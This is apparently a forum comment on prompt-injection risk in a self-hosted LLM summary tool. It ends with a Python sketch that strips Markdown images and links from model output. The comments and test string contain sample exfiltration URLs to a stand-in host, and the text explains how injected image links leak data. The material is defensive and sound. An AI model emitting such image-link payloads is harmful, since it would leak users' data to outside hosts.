The question that always needs to be asked (and ideally should have a section in the README): what are the limits of what prompt injection can do with this?

- Does the app support embedded LLM-generated links or images (either through HTML or Markdown)?

- Is there any long-term reading history being stored (even locally) that the LLM has access to and that could be included in an exfiltration attack?

- Are there plans to offer external hosting with user accounts? If so, the question about image/link support becomes even more important.

With any LLM tool like this, the answer to "is it vulnerable to prompt injection?" is "yes", so the real question is "how much can the app do, and how bad would a successful injection be?"

In this case, from what I can tell, it's just a self-hosted summary tool, so prompt injection would be limited to a website getting the LLM to generate inaccurate summaries. It doesn't look like the LLM has the ability to insert links or images, but I haven't tested in enough detail to be sure. So the threat seems minimal?

But I really encourage projects like this to add sections to their README files spelling that out explicitly. We need to get better as a community at making sure people understand that prompt injection is a factor that needs to be considered for every single LLM-based project.
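
For what it's worth, the image/link mitigation I'd want to see documented is fairly small. Here's a minimal sketch (my own, not taken from this project) of stripping Markdown images and links out of LLM output before rendering, assuming the summaries are rendered as Markdown; the function name and regexes are just illustrative:

```python
import re

def defang_markdown(summary: str) -> str:
    """Strip Markdown images and link URLs from LLM output before rendering.

    Illustrative sketch only; a real app would likely use a proper Markdown
    sanitizer rather than regexes.
    """
    # Drop images entirely, e.g. ![alt](https://evil.example/?q=<exfiltrated data>)
    summary = re.sub(r'!\[[^\]]*\]\([^)]*\)', '[image removed]', summary)
    # Keep the link text but drop the URL, e.g. [click me](https://evil.example/...)
    summary = re.sub(r'\[([^\]]*)\]\([^)]*\)', r'\1', summary)
    return summary

print(defang_markdown(
    "Summary... ![x](https://evil.example/?d=secret) [more](https://evil.example)"
))
# -> "Summary... [image removed] more"
```

Dropping images entirely (not just their URLs) matters because an image request fires automatically when the page renders, which is what makes it the classic exfiltration channel; links at least require a click.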